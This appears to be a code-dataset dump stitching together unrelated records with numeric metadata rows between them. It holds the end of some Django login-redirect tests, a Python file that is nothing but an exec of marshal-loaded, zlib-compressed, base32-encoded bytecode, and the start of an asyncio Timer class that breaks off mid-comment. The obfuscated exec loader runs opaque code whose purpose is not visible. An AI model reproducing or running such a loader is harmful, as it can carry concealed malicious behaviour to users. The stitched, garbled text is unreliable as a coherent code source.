    self.assertRedirects(response, reverse('user_login'))

def test_finance_receivable_delete_out(self):
    # Docstring corrected: it previously named the liability delete path.
    "Testing /finance/receivable/delete/<receivable_id>"
    response = self.client.get(reverse('finance_receivable_delete', args=[self.liability.id]))
    self.assertRedirects(response, reverse('user_login'))
# Category
def test_finance_category_add_out(self):
    """Anonymous GET of /finance/category/add/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_category_add')),
                         reverse('user_login'))

def test_finance_category_edit_out(self):
    """Anonymous GET of /finance/category/edit/<category_id> must redirect to login."""
    url = reverse('finance_category_edit', args=[self.category.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_category_view_out(self):
    """Anonymous GET of /finance/category/view/<category_id> must redirect to login."""
    url = reverse('finance_category_view', args=[self.category.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_category_delete_out(self):
    """Anonymous GET of /finance/category/delete/<category_id> must redirect to login."""
    url = reverse('finance_category_delete', args=[self.category.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))
# Currency
def test_finance_currency_add_out(self):
    """Anonymous GET of /finance/currency/add/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_currency_add')),
                         reverse('user_login'))

def test_finance_currency_edit_out(self):
    """Anonymous GET of /finance/currency/edit/<currency_id> must redirect to login."""
    url = reverse('finance_currency_edit', args=[self.currency.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_currency_view_out(self):
    """Anonymous GET of /finance/currency/view/<currency_id> must redirect to login."""
    url = reverse('finance_currency_view', args=[self.currency.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_currency_delete_out(self):
    """Anonymous GET of /finance/currency/delete/<currency_id> must redirect to login."""
    url = reverse('finance_currency_delete', args=[self.currency.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))
# Taxes
def test_finance_tax_add_out(self):
    """Anonymous GET of /finance/tax/add/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_tax_add')),
                         reverse('user_login'))

def test_finance_tax_edit_out(self):
    """Anonymous GET of /finance/tax/edit/<tax_id> must redirect to login."""
    url = reverse('finance_tax_edit', args=[self.tax.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_tax_view_out(self):
    """Anonymous GET of /finance/tax/view/<tax_id> must redirect to login."""
    url = reverse('finance_tax_view', args=[self.tax.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))

def test_finance_tax_delete_out(self):
    """Anonymous GET of /finance/tax/delete/<tax_id> must redirect to login."""
    url = reverse('finance_tax_delete', args=[self.tax.id])
    self.assertRedirects(self.client.get(url), reverse('user_login'))
# Settings
def test_finance_settings_view_out(self):
    """Anonymous GET of /finance/settings/view/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_settings_view')),
                         reverse('user_login'))

def test_finance_settings_edit_out(self):
    """Anonymous GET of /finance/settings/edit/ must redirect to the login page."""
    self.assertRedirects(self.client.get(reverse('finance_settings_edit')),
                         reverse('user_login'))
| 43.984709
| 105
| 0.611787
| 4,481
| 43,149
| 5.719482
| 0.03102
| 0.057747
| 0.103242
| 0.0803
| 0.918062
| 0.868586
| 0.82551
| 0.820087
| 0.788755
| 0.663116
| 0
| 0.005451
| 0.268766
| 43,149
| 980
| 106
| 44.029592
| 0.806827
| 0.127118
| 0
| 0.595474
| 0
| 0.001414
| 0.217095
| 0.090556
| 0
| 0
| 0
| 0
| 0.226308
| 1
| 0.149929
| false
| 0.072136
| 0.009901
| 0
| 0.166902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2298ed5d9c7f6d328f8e685f0d2492ea174690b0
| 12,014
|
py
|
Python
|
All-Operator/3.py
|
Alpha-Demon404/RE-14
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
All-Operator/3.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
All-Operator/3.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 41
|
2020-03-16T22:36:38.000Z
|
2022-03-17T14:47:19.000Z
|
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b32decode("PCOI3G2ZR5OVOWUGR7J6S5ASIJ3ZYNAN6QCSBRCFFZYLDZVBQUIGWRFZACSA4SERN5ICLJ62KRJB44EVKHKLP7CJ7YGTZ37WSACBUFB3WZH63M4HWW7OCHOW3L47F5HK2657Z6K373OP54W65F2D5HI63U5T3ZGDXXR4HPOT7GW6HQ23U7ZY6TXHW5HY7XR2HXSMHD2P453Y5T3PT7HD66L5TSB66HRHX6RZH5MBV7PDXHO7H6OX733U73QHJ7X52P42PJ7TZ5HOOD2PR7PD2PL4677735V5253XX7Z3R7TMZ66HYEHXJLJ6ODKUPJ7TY6T7HT2PR57HI6XY2PXZZTFN73QHJ7WF5HTMHU6DB5PX7PT7PJ4P75PHR5HA6PZ2LV6XR6XK4PJ5L7OTK47T6XL5OT5IVL766D2B75267XDWS377GN7X35WJD4UUN57ZZPNHEUPTQWG7KIW2L6C6A3Z7PR6ZJ77CIWW4PQP3345WRHJZR37DCR777X5HZ5PUYGL6OJYX773OF6WZWOV6OF27HZ6XY7H3JO7H37XIYFY4FRPTC6LU6HR5PLY7ZRM3V677WHD7KH77PQ75IWFG63XUP47ONT3OP6VGWXF6GD6LNP5KU2NNWP7F2D2W63VOX547S5BOPPYMYXS4PZ67T6HS7K3VPZ4LE5LXPP7TDT3QHTXRH7QJZ5ADZ3ET7YE46I7456PYOUSC5DRT37CPFLYU5ILV6XG5HT4DMTW7RP4PP33TLSR6O4M6PPYOZ6OT6OBS677T4R3ZZI3UHB7RCSFZJUL2DPFJAUHDUWZPNQERPQL6PPKDQTVUC4Q37KU35P76FVZ73T66OX46J245IMLD5R42MYL3ZA45L3LCVNTE6V454ONZ4UUYWUWD755KU3GTYYTRZHKVFK5L2MD3HUU4225ONTNWFZ2M65JJ7LXEO3F5K4LUV5NBU6NLHDNB3POGXH5656PB3H2SZER2LOU2F5U223MHGMZ2OXX5JJWYLGD3FDJXFXYQMJSHRLQYR2LJ4V44PP35EUZLY3N3AZ7TPGNZASXJV3T6NSTMHPH3LBQ3VZLJXXM2OO4DQTFUFOWFC65NOP3VK25O3OT3JUUYBTF5VEN5L5Y63YVHZF7K7TUYYJED53HCLIN2HTGSI3QBS2OEKQMRDY47HQX2ZGLC65YYLOX3OEHPCM6EWSTWAJ6D2GT4RJ7Q6JMJ23V4HTDKPPD4LLO6LWMK37ON2WE7NRH2NROEHGM47UPHMC3OWJUQRBCHJMYNFWSRETJIQZYBFBG4JUNMTGI6JVPO4OBWPVHC2GK3TBRCHPNNV4MUN4JR47WMSZEJOOLBBUQ2FHCOMORVYL33GE5A4BLEWPK23MWUTKS4C5ZPBXFW7I4ZHCLGDCZUVYZ6GYYQDK5UGLEUBIT42ZZY6KZJU3PEXHLFSDELBHG3ZF5Z5WYLI5VFD5QLIMHYHWJHXZTMIO2ZG5WFKZPMKIBN73KMFE4R2TTDE5J2YL3T7BWGZV6Z3W3W4CKJL7GZD7PN5XYIXGW5YVYLPMQJNOSZQV5QPHMB36OKTPMYP54ME6G3FIRFNDLJGATOJMIKWBWNUP32RBDE5ULHSNCFXROAZVECLWC4EG7445JG4NED6EWRBRNSM6PSTTM23OUIZUQSWMIFU33TDIZUEHB4M5JYQVC2JG5Q7ETN7QOCCZLKWYNLXBUNXYCEHVINZ5AEPH4RDST3IOMPMIVH3FO6NTF3WB67MLMYXAW6GRNNQ5KGX76KQCSVDEQYZPAJNMHI4EZLSEWKXNKWLWQ5B2LQHOU6TPV4WHKMKMTGS43OWXT62UYWMWEFDCTJJ2L4H4WWGG5LAVLUHSYK2K2K2LQ2ETKRN7HOMSP3Y5PL4Y3HXF6Y4MTKIO7EY2C42U5EYO46VS6YV3NDC7HJHRRHU335VTPLQNOULWQVFGEF3LO
ZTLUMHMKNBBUW5WOGOV4MBM4CDFENFD4OZUZRQZDELGOQG4EAADCUIMIVWYWEVFQYP2DIY7VCGM63TTW62MQEQPZTEE6KRKA6SZUPLF3NXVDR3RLNLYLG3BWXC3XGG4MJHS24V2GAUHVYCJUPJYTGWSXPRETDUXNBEQGF6U5SMY6ICMES26NPGKEG2GLNKJ5JMLVRRGKJE7EQVBID4XAOAADOPKK3HKQSKH3HGNZUOADY2W6FMGZ4PIBS6NJ3UDLELE2AXS4HJBNJXXIFKIDDDMSJZRTSWU4RKTXVLVQ43NJXS4ESCQGRCYGQAXWT7A4W3YGVRYDGQUX5COECCRNBCEKPBLUVGRFYU5HBUTSYPSWK5Q5NUKSMHMX3BG2WBUJ5QWZJB2HIMMNSUJG43FXCIZUIG3RQCMHABPB4KEOT25AGGZ5YIWJK7WM6CAQCUWXZ2NYEE4BYPNUDP6M4ECTAXK2ZCUORFRSXCMMIIQVTUDYQPFTOGCQNAZNOOMMIGLMEGCVDRVYAJJJ4UGEA3WVYHVNMZTTEC7ZZVFLQ3LQKWESA5UB5NSQSXHXIGGASRNGZ6VQSMAQRXLUORZNCUNJSPTXEF66HNYRPATRBWRAUGQ2VZ3BCUSMA4WEWYXDNOOBC3AASNQMUYJYIUA2RHZDJTFICMM52MFTNDV6WLVYYXO2DVPPKIATRDAREEZR5AVXUTCAIQL7AUNPUCYA6NXELPJ7BFFV2YCVWN54MIUHTT2EHXGCLUDFIHOFYL5YGETVRSJHXUBH6A2FOUKH6XADFJFY2JYKWCN7AYHXEBDI4UO5ZG2TFWMCLUV3AE5M3NACNAWCHCZGODF5LBM3IGW3T4ZX5WDFUBPGIN3PA6IKGPMELK3VLNQKLYGIRXNYAJFRFUYI2B66HJ7SCGV2GH6AEUB22AGL4CSCULGBLDEPL6AJUI7C7MDLSGQVHKVOUARESWQBF2VNTW5PPVOUKOZQRN4R22EFW6ES6NWITPFTNMFJ64QMOQXRJINSAUOAT42BM3GXPTW4NMYFYMOMPITDUHNMO5GUGQ4YBZPJSJAWKSDBOPNXLN2TO3FALCVAYSUSJ5LMQP4CLBAHFMZRAURZRQFQJW5DXPYG5GETEBBJAEOZVKAOWBGE7P3IHYU55ZD6SX6QBXZETJEYNMW4WDABRUA7FWRQ3A2UV6HJIZ7GVB3IRTE2MZCAUEZ4UMAKURKDAPQJ6AB6OAVWAKLZBNCRC7IIEUKYQORHTHU53QS2K3GEGZGJXITGTOMGI5J2JG5IV7NWFKA4ACCTSEXJOSVKPNGBG7QU4YNNERNYKSWXYNZDKGWVKFUDHCZ6ZGF64J37SF6LAKNIBHGIER7HBVUAKUYFQA6AYTX5LFPSGUUSBQOXTITHDJ2ABQVDPBXLG6SAHRIAFBWPRMOCUSU7RUBO5KVDVVAQFYO4FCCWZYEHXLDUCWKSCHPOVVQ3FFC6EQHFA2HUHDVWDVMAPVRXAQVDIS5KFE5FFFS5CCWA2ZJ43RMEW4EB22TK5IJULXAOSKA3RD2HUDBWEEA2MY6BRNOEXDMOVHQBANAJIA5FRUIUWGFQHUQ3KZMZGPAIADPMI2QYGWZVKRHBAFWBAOFCFYA5IVB62WGRVQFEQPJAXOXVXILCTAEGC4BJ7XH7YNIFTDALQUBYIFDCUTMKRFCGC4HV5S46OEQ42JCQTPBVBYHOQS7JO72TBFIFOMZJO5QBX4SOJTYVG2IT5IQ7XIECOFAAZQHNRMD2Z3ANPRTKUYB4YVAISJTEXOSZ5EANJZSBBKPYKQBDUNLTJRKPKFHUGVEKTHZBUO25CNIGGTDL2AT4W6YCTJXVEDKBSLDF2JEUBXIRNIGYCVA2LVBOAG5KFWCDFD7QMQADLFTUUE6NACAF5UMJCFW4G3XMZCFNGIGPVBGCTLWMGYCL3HVJ5IAKZAAASINZMHYEAHUFCJKZGCNCABNYIAIVNJS6AAMZAW6KRCG7GKG22KCFDGIQ6KU5
SLUUZSMKC3JDYIQNVTBD44ZNSIWKG72BNN2BMVZA5WML5GRCRQ7RDMIS3MDT5H6VY2E45JZHSB7CQFFKBIRMG2XMMCWYRGHTOHUDDSMLJSC7MI7ACKRJKSGIQD35HTIZJM3JCR6LBHSLALTIPMPA7HOCSBN3O6WGHBNMB6IAX4LJYXOISIFIOOAIMS5UOXTLGMBJXEJASVQGGJZD5RDOGBHJGCHVG45VWLBZYAA2QMMCP2IR7J5WUJSULJNMYHHZN6OBUDUIRMZ2J2HJJQHPJ5BIA5VAQGRFGNSKGVOM6ETYO5NCO5ERXTXVZLUICONYCK2HFQEHFEQMRGC3YK6BC3CBQTJEVWPFQSJCHPQS6IWTXG2LYN5XBMFUHHRUM2JBQFYNTZKAAZIDAE6YUVNJTIKGFPSDQXCRROS6NHAKAFDOGUJEJVWQ33DPWWUQKVMM4SIOYVK2V4EA42B6DZXARUMBM2A62EZ3QOPOEQHWMQMCRUHXXR6BU5BQQ4IPI2CIKACOOMMYBQQ5CZAIO3PIQLAG5NBFPABIOESEUOCTZNJXDL3AD24VV2GETWQWARRJFERECAGCMKCFD3AN3ECLGRZXHFH222BJAWRMNPLCQ6TS5GRNWFPVIK5NZYJBTHXBO2KD35IIUTCNKEXSQ3KIBBD3YABZM7ATBQHHVAQIWOYXBHP3C4B4GBY56ERH3YBAMQ63FESIZ3YCGIOX2G2BEPNJA3RZXKUM4CCL2LKKGUOH4LGRHQEODTEOEHNUUFTBJKOS3QBTEETQARN6GKM3TN5UA4LDIF6UNDCTFUX43PAYWEA5KQ6B3UBJAVRLAJYEAXKQP6SSOUUEXJJMMT6BLY2BTBIY2EUG2EXE5Z4M5LZIWNUDXX5INCMZP2ARXMNWGAZCSJIJ2H7HTZSZKCC5NKULWZXREZVILKGZXL4VIQGEMXIG6ZALIA65E7MM7WPBW2KE5PCMDYJBN32KYMQ7XG5BIVMWBT5FJCUD7LI5QROLHF6PWSFUIX6SR5QJMRIODAMWIZ27AC2CIDSUO4WWYOAKR4RZREK6AAXPABSRQ2JJDNGFOIQFE65QONCECE6FKJQQ4TCFNMCBQ4UCCABHOYDGUMNLAPKIGTZAVR2SNX64CD3IQ3FBIYW4TEXK2BHNKFALLUYY3S7TFNEZOAT2OAMRKAMQRGI6NDEDORNAUOWROQCQC5IAKZ5NSI5GWULEUTJY7JACOAQPGRWZA2KJOER3A6MBQTHPKU6VMXNABU3ATUN4CXRRGMSIO6IWETELE5VSXTHIQFNGAYEGHNAKJCTXOMUOYCLFZ3JATXSBQB4PDVE47SSFYEDZ6ZXDBPNEVSVDNSBWPGDLFJDCC23QGCUCTT4EP3OUNMBFUKA5VWI4WLABWHQIWZQ4PNIPB6AANBNEBH4MGQOVMEL7DBQFJKTGEQYR6MBQS6DFUSP3UDHRTFIFCN6EAA3DGQBGEMFNHIFYJ5SGRGAJMYQRKNJZN6E2KTKQMVBYJ7MATQVH7MKIWQA7JWNQRVOLCVVGFOUPTCJULKB27AHUBBZIUUJIMQEANFD2B4FJNCGLJUBDDCNOGQP6VDSAN4YCK4TXSCJAV5W7PIDRBHXI2WIRGKUMADBJENVLWSJJMGOVAUUAAL6U5DPUEMQAWGVHOIOBJJHUSGSNRYQGQLWJX4AW5KAORMJNYSKYCZZW2A7JOLIE2DAR4EYNPRGBZSOLO2DTOUQ64E4FRRO4OARO4FESCT7MAMGJEFTUFMY5VYBV2EYQKJ2XU5IMSIMJ22S4YCCWE7FCC3BZBZVYO4EAIBAZYREFIUTYGSIOT4EV5FAM54XHWYQTEZS2FJBO5JBKTQBHJI7LZXF2OKY3ASLCKTG2OAXNJGF4KVLX42JV5EHYYUMRBXPWKI3724DJNLA2ANAUS3TC2AJYAD2F4QUR5EAKMBPVUODQ6EQORRA7HAIAALNICRD6A44JBSHWQ4XU2C3VEQEFWF4FEEUO3UJHWQ2H
F4TKS3PIFFSLEJ56TBBZC3XCZQKBLEAGFDD5N4VJKUNLGWWHZAEIVRX4WVFAMJ6VVVFJLY6JCGMQ522EUNC3TJBULKKN5DGUACAU34PPE4ZB5Q4BYRKQVGDTW2UMOLJCWJ4CZ7EA4PA6MQMC6SKIYWSRRMTAK7GG6AL4STGDONKIW5I3FRWMO5PCAXQJIWNFZOLUD3JT4UVWVBD5MDI5TBYCA25MO6FMQHD4WABHIIOVOBSAQY4A22QHEYRO7IMMYMCND4232IILAIVQQMPB2MCI3VBDPQZPFDKVQUYBYMKB62SLBM7ZRMLKLCCQ27TBHCBC4GJEUTOP2ZXIICYLACNBYFZMDSOIOAA4RUJ2T5JAGSECEAF6IHS23VA5PGIUFKLP7SKFWCULHRVYTQPLRA6ZMAKAZFE2UYW4SVI2SEOQZJBGSCURZJQMVKD7EPDYDHU5V7TWCPAYUYVYQAINUFUQUCJKEHCAW5UYSBISAULBE7KZUV37VCEUADA34DUVWFGQ5SYCKVMAU4ZJAZEHDBFNKLBAAGZRBZOFP2276SIR7G25A7IRDRGBD7AUPSYPZKOW5CMXAKYHAEUZAVLLDZGCTDFS7XA6ZBG22AAX3K4DCMOC3UESWRIRKWHQRIHZVD526GWCFKBSLGMSSININPBR37J5BXAVW42JDXEQTUASTNXEHMMWR5HSYWFYQASZ5A5LF4HZXMDUUWNLKYPKKBVLMSEYHRPBMOR3WGQ2RMF73SILBASPDQFWACVYEM3RFXJSUPXARSEKNCQZ2FNCR2HJOLRTB7OUHPDBLG2QSEBZMTVWRC3RRIFENQ2FE2BSDBDV6MIPFF7JICGEHKB6GAD3RNTXCHSQIOGQGOOFNNUQQUNUOZVWRGDME7EUUWNLKV2BSYT2QBRAYQCLB5MSW52JGQ6JLPMIDNHWWKMTRQL3CAETIBDINIMRTWYBKLCBM42SQC5JUG47RMQDMMP4YNZHGSNF2JPECBA7QJN4BGFZBLIVGZ4AY4BSSZQSOCQBP6IC3QBMIUG3VZN2NB4GUSOFFUARDNKCUEWZQVE3RSYFUF4HUHUTBXYYL4YZV6QQSZV5VNJDYCIZTMOIISTC3SEQZRABGKUJY7JNMWYQR6LPK2BG5ILBGSTFG54XVHAVQBSTKXFAEXOCUMFDPGW2GJU64FLYLTDVVICZCCL72AAWWOJ6Y6WLKM3YAOY4CDSRODKVIIN6SEOSNHJQWB66BLPSLY7BMHVOERBSHZR3ZRE5OT3GITJWEV72NRMC3I2FTOWT5Y7BVAVLCLDQC2SCVNCM5IIVVHRUKAFI2ZFVAVXQDFC22EO3KGQC3WERKMKVHFEWFBBLK3DOCAMMU6DM7QACPIL6OEXQ3SCXQBU6AAT4QS4Z6BKLUAVGWCOXWFVXWNDKDI4NW3HVGYUC6I2A6LLNADOWQ2C4BEGQGURCAZI6ZFX3BUWNH4XS2U6RF65UEARUAJM24YDOJBZGBO3J6NBMQ5MQAQWFPM7MMT5NL3MMHK6TSAYL6W4JLAA6R4HAVDSD4UFKUH4FLBPSCYOV4M4DXKQJLSDNPIS3LDIUEUXEPWFMHPLJXIJ6AMULK2R34AIS2MZZNXPFV2JEHDFTO5B7H3WYYGXTWRII3CASCFZHD7AXHGVBL6TCTQOZCAM2ADROJG54ENHKTIBDY6ESI3JZXHJEYLJNOBOBZERATFWXKIE3VA2O4C5Q2AO6JULBGKRAZ42CCAOF7CVC7FZNTWT32LRR5V2CVONRNAI2DCHYDLZSNRWHAPGVCMV4Q6DFQ4UFSDA5DTAIDMSCQSTQGN2FXM7CMU2Q6SEFK3VF7WM32MM5B3ADSMYZMBKORCI3I5UOSWN6OOMXBQUM4WEJ2QQNAUQLTQM3MHMMM5KQK5IH5C7SQBRN45BIO2EY5J5ZQKVQCEKIDWCLZG7AAOGATHGDTZAQVBFHEA6VCVUIH4GWN3BE2S3ZEJRRBGY4LMTAP25XLXEVFVYUJ55Y
XC265EYFZFGPZS3PULG2XD24XKV6ELPNUBEE6LCOKYPROCIDEGCDRKIBQIBYKEZTYVSSNAQGLUUVSAX3TGMK25ANOFJXAU5KLLWCBTVVQZXFENK2VAGI6LJEEGVJYCUZIK3ZKH2CHUKGUPKBNK6PYILYIOTTWWCZ6BIL4A2KCBVMPFE3ZQEPUKIAVI2D7QAZYDFDFF4ERDGG7XNSIGK7YCJSJKHUBCRSEMZAGWVS3LTCMNHR7XAX4BFSUPU2BB2GLSFQ5N44O4RO2FBP5SJWMBPQQZ5XQYF4HFAVSDKTM424HOF5WYIGPDEVCHWVA4GGSSZS4FINI4ZSA6KA3MSIMJFEBYVT7NCCYIQIOVFM53MUB23NEQMAU4YUOF7BCYMB6WLLNSUQPSOVSBKE344MI3AOXUEX2SBWUFGMQKE5ME2KLQVYABNZ4NQXLJGA4G66GVDYNLQBAXAQMNLCCFAI4H2XGW5I53SDLRYCHLRX3B2HY4WREOLTU5QFRMD2YFIFCMZKXEHQK2TJQCJHCDALM5ZIHPCD4X3AQK2S7KDNXSXPDVC2JONSSHJ7ZD4SCTXYPQFHJLIWJQVRM4AA6HRJXDBSMZCORSZO5LRRIC3A7KUIFHXIIQR2QEAFMCFYMB3WQ5MJQ5OYCEXUUO3FGAZ5EOLUWIZTGFRCAXKZDNVYFME5MUSRJONTGNANGUXMEURKV6FED2PAVJBJ7KFHJBCRWUBVURMBIKCZ3AMAI6WRFED3AQ6VZYLTRARVYA4RUXW3N2AUSXNW23ASUVWQ6V5IFKCGNAIOTTASGFTBWAZCS2YOMKXDIBAWBWQ325DDQBK3SAZKKH47LSW5BG6FBNVIMZOBP7HMWDLZHCNKBSBQXVPJZEEE2OBLWUQWBZVGQADZ5RVOG4RAODE7SJORDI2QGOFN4RBWRPIXAE4AB37OBSDIQXWZ7ELZRNP7W4U7FPQDXEIJI2RNYQ4ICSW4KHMQEZJQRUA6CMP3FYQK6NMG7B2BYBL3ODQOQQZLFUJTLZ66R3KZFOPAHJBA3GWSM24DEMGCVOKTJOHNHUN2VIVHMPAXM6QRFIP25QFITWIYFQ2A5LJUXIUIM6PJBXE3KCGCIA7AHWQ2YIA674CBV5G2DUCM23EBJYZCUC2UQTDKGI3RCBFU2WQTNCAY6CF7FLO3CKN5SKIKJT5NSKEVZRX5KZSFZNF4Q4IWABAWYQXFF4ZI7TUVQPJ7EYTSLUR4CRHDUAP3F3UROEN3YEI4RURDFIRMR6VL6XGGHJKORSFRBAEYBIJBCCVAXFENDCUBRJIVHP2US5ELWONI4WEOC2BASCFKYEMNFFAJVDRNOBQ5CUACCECQRH6CIUWC2FLF7IMF5UBKGPHNC7H3CNHABMEICZYH7JDDZWAGEABVYC64W73S7TGMYXGER25STRPTNFNJINHUB4NPB6UPA6TIEQMLKUAIGTNC7CBVYM4CM2FERBUGTAJHYAQ6GI2AUK6T4XZFGB3BQCE2VVUETHYVFPVYEXCD53JJVWR5L6DE7TLVFMLVFDKQX3XF2YHJ6LZXROZFNFTMCBC4SWQVAZCDXUIPLKH5MHVSEYCBDLJUBJ3OZO32LITDT5Q52FHTJA4JIN6UVTLKTVLHXUQFNYTK6GJ5R3SZFAHBU2ZVRWFGBZ6CD5QOSFX6KHVVEKBZNWZIJK2FHVZLUONHPBSCOWDI5GQZPKQJTUEALHUSEBZIQ4DAAJSAXCIFLRWZV6UZLI74DEDQ3HUKMW3BXMQNQAK3S3IIKIAZQIWFKAEU4W2OHAQZI3UDHG4IXNX62CIYRELSI3BVCZIYQ7YFE5W4CGKZPUP2AL7KEME3VQANTHWJ7NZZDNAWZSV55S3IZNYWLTRYHC5BHLXA43UFELSOPILSEU6GIMTBXFUWNJU26JHLS4KBI4MORIVZTTSWUKUSJB5SOCRBBCMYBFTIXBXMBWEYAT4MECI32J4WQAD32H7FDVLJOUD4I2XQZ4H7L5IGLWB3
ZESJ5D4XTVQCG3QGBHVMPC6D4ARRNUQNCWNKN4NGFQQ3PJQSG37ERUIWQWFIK3IACNBEUWUNQABMJUATX3KLXTCSMAKAAHQU7HHQYJWZ2DDUEKA2IFZNFS4V6ZUSSGL4EWH5H52VR4C2ENAT3R2NFGWKDTZLHZHAONMNEBSLQSSGZRQGQF3JGZ2CJBVA2GQR2ON2ECBYFAKFQRX7ZRNBJ7IC73OVW2LOA2XOME6VY3EG5WSPYSW5R4JRVUZRCIQGTQ3VEA4JQYCMNCSW4UMQU4SIYWKDC2C64ATQVO4ADMRV5PCAXRIJKFGFEFBG52J5RIOEGURSWTZAE25333GCBOLAD64D2DC6YIBEMCVM4OIDMZ4GIMPTRSSC7NCNAJLSCMSQGYSUIXWVOPVRXWTBD2E6E7K3TNVL22HPTKRQIR6LJBUJHUAP6HVBMZLJDTO4GAEW6QHFZYG2PLZOXXKYZ5HBWSHIKEYBTDI3W4H3ICUD67F7I5F2OYRQSAXPBHWWXAUGJWXBDY43H3T2ZEUPJPK4QKYDAWKNYSGPKBXHDC7LLP53FOGVPGW67RAEMQFFVGRYCRWQW26Q4UTQA52SFZ6QSXNMCV527DYBBNHVNSMYQZTWWITDQZUAAGMKELNXXGUD53JDM7WBHEABTP24O3ZSTZDBSK7E5DKGUKI7X3I436RDJG3AM3K5CGPNULWEPV4RIUXO3KQFDFW5SSNJ26S5BGZFIAUJQT5OZCEJ6QHLDW6DETTRNDYGG2JVXKCVNNS7UEJLVPY6SDHPOHOMQGJIGQNFSVQHM6HNLSVQUAFIA2NV2CJIRISUEBPLB2C2VONR4PFENVJKIFZV77BNKOXNI7SIDBHOPLVQOWHLSXF5IBQEKI2YHS24APPOUQY6IIMUT3ZDUGIXDI3FNBRVRS2BZV3MM3DAPOYTBZXIKFA2ILVMAXGKJCFDZQRNLLUOQ7D6M6R5JGRUKTOJV2O5UGB4MJLNIDZUDC27BZNUDXVIRK3WWGRQZSCPLJFEBXBCJBLOIRB6ZP6YUTYRA5C2EPFWTXLLDHVVB3W4MXPIHCWP3S2W6WVOTFH6F2Q3EUHSTWBB4ADPILYL6GWUVNLOQEPDAJSVQRHPIZKFC4OK3LXQOJMRV6YLLOQ2QPKCLVO3QFOKQHN5NADGCTVAQ46WQEKESBWLML6LJHFSL2HXVUMPO6LDEUVTPPMYRC5CYELTS2RN5PWBZMDJFKZE4CEPVYYQTVTHI5W4KERILXWGVIA7KDGOMLQAROUBOMOERRLJZXIGIAB7IEYPQQISRTVBEBFBTKRPN6FK634W2TQLHFFG6YVJ6VRMRLGWN54SAAAGAHQEAJ6GYBUSYLEVSYS4TJHNFZUIK3MBMK2L4V534APC6AKUA6EZV5UYXRFCK2EVU4RAT5VGQV5KKDC7IYJRAVCNIWNWWVK3KGEI4SSXZMWZII65JZNEXVAOS4IQ5R2GUJPLEGQZ3EPLPWW3QO3DD27NCH3QY6WDMFXIA6EHBWPHLCSIWQXALQVLC3ZUPPVHGYVGDQAILZDJATPINCJ57HCOU457274HP52PW5LTB7HZ57X5O4PL67D2ON4MLM5L6P26LXOP7BU67LU7L46T47HG7DDKO7O255S567PQNKT37Z4347LZOD4PXP6PU63ZO4X6W7HC52O746D4Y3P34632XDC6PN6PL7OPI6ONROT3OV3X7R4MLU6X357CU56BR6N3I35ON6HSXXXZ6VB27H65HX76VI7DHD7PE2HV5GNBK67TLXT463Y7L4OW77WMB6P33PT47Z3VYGEPW577V6LTO43J6773ON6UL4OTF6XG6L2SXBHDZ6P2PE7D33TRHZ5PF2PD47HS73XPB5M74YITB2OK7PWRP6LPD3O7W5X6SXEXYP4GXR6PZ4X64LT642PI575Z746XPTZ7H64H422TT7YPXPOXT577M3YDW77OFXX7QN6MEMNNA===="))))
| 4,004.666667
| 11,986
| 0.998169
| 12
| 12,014
| 999.333333
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171926
| 0.00025
| 12,014
| 2
| 11,987
| 6,007
| 0.826492
| 0
| 0
| 0
| 0
| 0
| 0.992842
| 0.992842
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
22c4ac29812190aed8302089f1e5e7c9c504e426
| 2,610
|
py
|
Python
|
async_util/timer.py
|
leeopop/async_util
|
c39b38d0a156d53db46612f7389011dd17f3dc17
|
[
"MIT"
] | null | null | null |
async_util/timer.py
|
leeopop/async_util
|
c39b38d0a156d53db46612f7389011dd17f3dc17
|
[
"MIT"
] | 1
|
2022-01-25T18:03:10.000Z
|
2022-01-25T18:03:10.000Z
|
async_util/timer.py
|
leeopop/async_util
|
c39b38d0a156d53db46612f7389011dd17f3dc17
|
[
"MIT"
] | null | null | null |
import asyncio
class Timer:
    """Schedule one-shot and periodic (sync or async) callbacks on an
    asyncio event loop.

    Every scheduling method returns the task wrapping the waiting
    coroutine; cancelling that task fires the ``canceled`` callback
    instead of the scheduled one.
    """

    def __init__(self, loop):
        # Event loop that all helper coroutines are scheduled on.
        self._loop = loop

    def trigger(self, func, delta, canceled=lambda: None):
        """Call ``func()`` once after ``delta`` (a ``datetime.timedelta``).

        Returns the scheduled task; cancelling it invokes ``canceled()``
        instead of ``func``.
        """
        async def _trigger():
            try:
                # asyncio.sleep() lost its ``loop`` parameter in Python 3.10
                # (deprecated since 3.8).  Passing it is unnecessary anyway:
                # the coroutine already runs on self._loop because
